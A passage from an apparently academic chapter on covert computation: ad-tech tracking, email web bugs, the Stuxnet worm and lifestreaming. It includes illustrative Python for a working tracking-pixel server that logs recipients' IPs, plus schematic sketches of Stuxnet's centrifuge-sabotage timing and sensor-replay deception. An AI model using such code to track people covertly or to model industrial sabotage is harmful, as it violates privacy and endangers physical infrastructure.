3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Of course, one element missing from this typology is surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor their own staff. For example, in 2006 Hewlett-Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
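&lt;br /&gt;
To make the mechanism concrete, the sketch below shows, in schematic Python, how an email web bug of this kind operates: a unique, invisible one-pixel image is embedded in a message, and the server logs whoever fetches it. This is a minimal illustration; the port, token format and logged fields are my own assumptions, not readnotify.com's actual implementation. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Minimal sketch of an email web bug server (hypothetical, for illustration). &lt;br /&gt;
# A unique 1x1 GIF URL is embedded in each outgoing email; when the recipient's &lt;br /&gt;
# mail client fetches the image, the server logs the read event. &lt;br /&gt;
import logging &lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer &lt;br /&gt;
&lt;br /&gt;
# Smallest transparent 1x1 GIF, served as the "invisible" image. &lt;br /&gt;
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff" &lt;br /&gt;
         b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01" &lt;br /&gt;
         b"\x00\x00\x02\x02D\x01\x00;") &lt;br /&gt;
&lt;br /&gt;
class TrackingPixelHandler(BaseHTTPRequestHandler): &lt;br /&gt;
    def do_GET(self): &lt;br /&gt;
        # The path carries a per-message token, e.g. /pixel/msg-42.gif, so each &lt;br /&gt;
        # fetch reveals which email was opened, when, and from which address. &lt;br /&gt;
        logging.info("opened: token=%s ip=%s ua=%s", self.path, &lt;br /&gt;
                     self.client_address[0], &lt;br /&gt;
                     self.headers.get("User-Agent", "unknown")) &lt;br /&gt;
        self.send_response(200) &lt;br /&gt;
        self.send_header("Content-Type", "image/gif") &lt;br /&gt;
        self.send_header("Content-Length", str(len(PIXEL))) &lt;br /&gt;
        self.end_headers() &lt;br /&gt;
        self.wfile.write(PIXEL) &lt;br /&gt;
&lt;br /&gt;
if __name__ == "__main__": &lt;br /&gt;
    logging.basicConfig(level=logging.INFO) &lt;br /&gt;
    HTTPServer(("0.0.0.0", 8080), TrackingPixelHandler).serve_forever() &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;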
&lt;br /&gt;
As can be seen, this is an extremely textured environment, one that currently offers little in the way of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps a deliberately low profile in order to avoid attracting unwelcome attention. Some of the current discussion over the direction of regulation on this issue has focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so, in the US or elsewhere (W3C, 2012). One can see this in the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?] &lt;br /&gt;
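&lt;br /&gt;
The mechanism being debated is simple: the browser sends a DNT header with each request, and a cooperating server refrains from setting tracking state. A minimal sketch follows, using plain Python dictionaries for the headers; the handler and cookie values are illustrative assumptions, not any particular company's code. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Sketch of honouring the voluntary "do not track" flag: the header &lt;br /&gt;
# "DNT: 1" signals the user's opt-out preference. &lt;br /&gt;
def handle_request(request_headers, response_headers): &lt;br /&gt;
    """Headers are plain dicts here; illustrative only.""" &lt;br /&gt;
    if request_headers.get("DNT") == "1": &lt;br /&gt;
        # User has opted out: serve the page without setting tracking state. &lt;br /&gt;
        return {"tracking": False} &lt;br /&gt;
    # Otherwise set a long-lived tracking cookie, as ad networks commonly do. &lt;br /&gt;
    response_headers["Set-Cookie"] = "uid=abc123; Max-Age=31536000; Path=/" &lt;br /&gt;
    return {"tracking": True} &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;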
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these tracking systems will only become more invasive and aggressive in collecting data from our everyday lives and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growing use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)… Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the user the impression that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’ – that is, the location it was designed to attack – whereupon it activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system which it then plays back to the operators, disguising the fact that it is gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors – this looks like standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, hence hiding its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
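&lt;br /&gt;
Zetter's description amounts to a timed state machine: long dormant periods alternating with short over-speed and under-speed episodes. The sketch below renders that sequencing as schematic Python, purely for illustration – Stuxnet itself ran as PLC code, and the function names, simplified loop and omitted details here are mine, not the recovered logic. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Schematic reconstruction of the attack sequencing Zetter describes. &lt;br /&gt;
# Illustrative Python only; not Stuxnet's actual (PLC) code. &lt;br /&gt;
import time &lt;br /&gt;
&lt;br /&gt;
NOMINAL_HZ = 1064    # normal IR-1 centrifuge drive frequency &lt;br /&gt;
OVERSPEED_HZ = 1410  # close to the rotor's mechanical limit &lt;br /&gt;
SLOW_HZ = 2          # near stand-still, stressing the rotors differently &lt;br /&gt;
&lt;br /&gt;
def set_frequency(hz): &lt;br /&gt;
    print(f"frequency converter commanded to {hz} Hz") &lt;br /&gt;
&lt;br /&gt;
def overspeed_attack(): &lt;br /&gt;
    set_frequency(OVERSPEED_HZ)     # over-speed the rotors... &lt;br /&gt;
    time.sleep(15 * 60)             # ...for roughly 15 minutes... &lt;br /&gt;
    set_frequency(NOMINAL_HZ)       # ...then restore normal operation &lt;br /&gt;
&lt;br /&gt;
def slowdown_attack(): &lt;br /&gt;
    set_frequency(SLOW_HZ)          # drop to 2 Hz... &lt;br /&gt;
    time.sleep(50 * 60)             # ...for about 50 minutes... &lt;br /&gt;
    set_frequency(NOMINAL_HZ) &lt;br /&gt;
&lt;br /&gt;
while True: &lt;br /&gt;
    time.sleep(27 * 24 * 3600)      # lie dormant for 27 days &lt;br /&gt;
    overspeed_attack() &lt;br /&gt;
    time.sleep(27 * 24 * 3600)      # another 27 days of normality &lt;br /&gt;
    slowdown_attack() &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;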
Stuxnet disguises all of this activity by overriding the data control systems, sending commands to disable the warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack, but is designed to unload its digital warheads only under specific conditions, against a specific target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
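&lt;br /&gt;
The ‘man-in-the-middle’ element can be sketched in the same schematic spirit: sensor readings recorded from the plant running normally are replayed to the monitoring layer while the physical process is manipulated. Again, this is a hypothetical illustration, not recovered code. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Schematic man-in-the-middle replay: operators see recorded "healthy" &lt;br /&gt;
# sensor data while the real process is being sabotaged. Hypothetical. &lt;br /&gt;
import itertools &lt;br /&gt;
&lt;br /&gt;
def record_baseline(read_sensor, samples=1000): &lt;br /&gt;
    """Capture sensor readings while the plant runs normally.""" &lt;br /&gt;
    return [read_sensor() for _ in range(samples)] &lt;br /&gt;
&lt;br /&gt;
def replay_to_operators(baseline): &lt;br /&gt;
    """Loop the recorded readings back to the control-room display, &lt;br /&gt;
    masking whatever the centrifuges are actually doing.""" &lt;br /&gt;
    for reading in itertools.cycle(baseline): &lt;br /&gt;
        yield reading  # the display renders this instead of the live value &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;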
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop Stuxnet, given the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source, and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have needed to work on it simultaneously to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developers of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack, and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet were: (1) to identify its target precisely, using a number of software-based markers that gave away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage the control systems from the physical systems and provide a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuge cascades and faked the industrial process control sensor signals by modeling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The hypothesis about the origin of the name Stuxnet emerged from an analysis of the approximately 15,000 lines of programming code: a close reading and reconstruction of the programming logic, undertaken by taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers and data structures, in order to try to understand what it was doing (Langner, 2011). As part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.)]] &lt;br /&gt;
&lt;br /&gt;
*Iran - 52.2% &lt;br /&gt;
*Indonesia - 17.4% &lt;br /&gt;
*India - 11.3% &lt;br /&gt;
*Pakistan - 3.6% &lt;br /&gt;
*Uzbekistan - 2.6% &lt;br /&gt;
*Russia - 2.1% &lt;br /&gt;
*Kazakhstan - 1.3% &lt;br /&gt;
*Rest of World - 9.4%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Clearly, this kind of attack could be mobilized against targets other than nuclear-enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plant show that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The increasing ability of code and software, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, that forms part of the notion of lifestreams, and more particularly the quantified-self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies known as lifestreaming, or the notion of the quantified self.[11] These have grown in recent years alongside the expansion of ‘real-time stream’ platforms such as Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and feed them back into calculative interfaces, data visualisations, real-time streams and so on is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’, exemplified by the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design driving innovation in computation, especially in mobile and locative technologies. In contrast to the document-centric model that Gelernter and Freeman were describing, however, there are also micro-streams of short updates, epitomized by Twitter with its text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, starting in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
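&lt;br /&gt;
Freeman's description translates readily into a data structure: a single time-ordered sequence with the past at the tail, the present at the head, and future items (reminders, calendar entries) beyond it. The following minimal Python sketch works under those assumptions; the class and method names are mine, not the original Lifestreams API. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Minimal sketch of a lifestream as Freeman describes it: one time-ordered &lt;br /&gt;
# stream holding past documents, present work and future reminders. &lt;br /&gt;
from dataclasses import dataclass, field &lt;br /&gt;
from datetime import datetime &lt;br /&gt;
&lt;br /&gt;
@dataclass(order=True) &lt;br /&gt;
class Document: &lt;br /&gt;
    timestamp: datetime &lt;br /&gt;
    kind: str = field(compare=False)     # mail, photo, bill, reminder... &lt;br /&gt;
    content: str = field(compare=False) &lt;br /&gt;
&lt;br /&gt;
class Lifestream: &lt;br /&gt;
    def __init__(self): &lt;br /&gt;
        self.docs = [] &lt;br /&gt;
&lt;br /&gt;
    def store(self, doc): &lt;br /&gt;
        # every document simply lands in the stream, kept in time order &lt;br /&gt;
        self.docs.append(doc) &lt;br /&gt;
        self.docs.sort() &lt;br /&gt;
&lt;br /&gt;
    def substream(self, predicate): &lt;br /&gt;
        # 'organize on demand': a filtered view rather than a folder &lt;br /&gt;
        return [d for d in self.docs if predicate(d)] &lt;br /&gt;
&lt;br /&gt;
    def future(self, now=None): &lt;br /&gt;
        # reminders and calendar items sit beyond the present &lt;br /&gt;
        now = now or datetime.now() &lt;br /&gt;
        return [d for d in self.docs if d.timestamp > now] &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;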
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of the data collected can be relatively large, and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kind of sophisticated sensory circuitry that is common in smartphones, to log GPS location, direction, and so forth. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&lt;br /&gt;
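&lt;br /&gt;
A concrete serialization of such an activity, in the actor/verb/object/target shape the JSON Activity Streams 1.0 specification describes, might look like the following Python dictionary (the people, identifiers and URL are invented for illustration): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# A hypothetical activity in the shape described by JSON Activity Streams 1.0; &lt;br /&gt;
# the person, identifiers and URL are invented. &lt;br /&gt;
import json &lt;br /&gt;
&lt;br /&gt;
activity = { &lt;br /&gt;
    "published": "2012-03-04T15:04:55Z", &lt;br /&gt;
    "actor": {"objectType": "person", "id": "urn:example:person:geraldine", &lt;br /&gt;
              "displayName": "Geraldine"}, &lt;br /&gt;
    "verb": "post", &lt;br /&gt;
    "object": {"objectType": "photo", "id": "urn:example:photo:9", &lt;br /&gt;
               "url": "http://example.org/photos/9"}, &lt;br /&gt;
    "target": {"objectType": "photo-album", "displayName": "Camping Trip"}, &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
print(json.dumps(activity, indent=2))  # ready to transmit and aggregate &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;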
&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organization (such as Facebook), the key is to pattern-match and compare details of the data, whether against a norm, a historical data set, or a population, group or class of others.[13] &lt;br /&gt;
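&lt;br /&gt;
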